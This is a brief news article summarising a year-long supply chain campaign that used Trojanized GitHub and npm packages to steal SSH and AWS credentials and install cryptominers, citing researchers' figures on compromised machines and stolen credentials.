Credential Theft and Cryptomining Insights from a Yearlong Supply Chain Attack
Credential Theft and Cryptomining in Supply Chain Attacks
A sophisticated and ongoing supply chain attack has emerged over the past year, primarily targeting both malicious and benevolent hackers. This campaign has successfully stolen sensitive login credentials by utilizing Trojanized versions of open-source software from GitHub and npm.
Details of the Attack
- The threat was highlighted by Checkmarx and Datadog Security Labs, showcasing its extensive reach.
- Attackers infect devices through long-standing open-source packages which install a stealthy backdoor.
- Spear phishing has also been employed to target thousands of researchers.
Implications of Credential Theft
The primary aim of the attackers is multifaceted; they are collecting SSH private keys, Amazon Web Services access keys, and command histories. Every 12 hours, they gather sensitive information from the infected devices.
- As of now, dozens of machines remain compromised.
- Attackers have accumulated 390,000 credentials, including those of WordPress users.
- Installation of cryptomining software has been detected on at least 68 machines.
Final Observations on Supply Chain Security
This ongoing campaign highlights critical vulnerabilities within the software supply chain, particularly in the open-source ecosystem. Continuous vigilance and enhanced security measures are imperative to protect sensitive data in these environments.
This article was prepared using information from open sources in accordance with the principles of Ethical Policy. The editorial team is not responsible for absolute accuracy, as it relies on data from the sources referenced.